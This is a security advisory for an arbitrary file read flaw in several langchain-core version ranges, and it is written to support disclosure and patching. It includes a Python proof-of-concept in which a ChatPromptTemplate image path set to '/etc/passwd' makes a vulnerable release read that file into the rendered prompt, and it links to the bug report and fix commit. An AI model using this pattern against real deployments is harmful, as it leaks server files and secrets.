A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises because langchain_core.prompts.ImagePromptTemplate instances (and, by extension, langchain_core.prompts.ChatPromptTemplate instances) can be created with input variables that resolve to any user-specified path on the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, this can lead to the disclosure of sensitive information.
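A minimal sketch of the reported pattern on a vulnerable (pre-patch) release is shown below. The template keys, message structure, and the /etc/passwd target are illustrative assumptions based on the multimodal prompt API of affected versions, not a verbatim reproduction of the original report.

```python
from langchain_core.prompts import ChatPromptTemplate

# A chat prompt whose image block takes its location from an input variable.
# On affected langchain-core versions, a local file path supplied here is
# read from disk and base64-encoded into the rendered prompt content.
prompt = ChatPromptTemplate.from_messages(
    [
        (
            "human",
            [
                {"type": "text", "text": "Describe this image."},
                # "path" as an image source key is the assumed vulnerable input;
                # patched versions no longer read local files this way.
                {"type": "image_url", "image_url": {"path": "{image_path}"}},
            ],
        )
    ]
)

# If "image_path" is attacker-controlled, the formatted messages embed the
# contents of an arbitrary server-side file, which can then leak to the user
# directly or through the downstream model's output.
messages = prompt.format_messages(image_path="/etc/passwd")
print(messages[0].content)
```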
https://huntr.com/bounties/be1ee1cb-2147-4ff4-a57b-b6045271cf27
https://github.com/langchain-ai/langchain/commit/c1e742347f9701aadba8920e4d1f79a636e50b68